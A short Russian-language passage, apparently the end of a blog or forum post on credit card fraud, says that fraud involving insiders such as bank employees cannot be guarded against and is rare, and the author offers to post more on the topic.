Бороться с ним нельзя. Можно лишь смириться. Здесь уже ничто не зависит от вашей внимательности, осторожности или предусмотрительности. Бывает, что в сговор с мошенниками вступают те люди, которым добраться до ваших кредиток и так очень просто: служащие банков, например. Это случается очень редко, но от таких случаев не застрахован никто.

Повторяюсь, если данная тема покажется полезной, напишите об этом и я выложу ещё.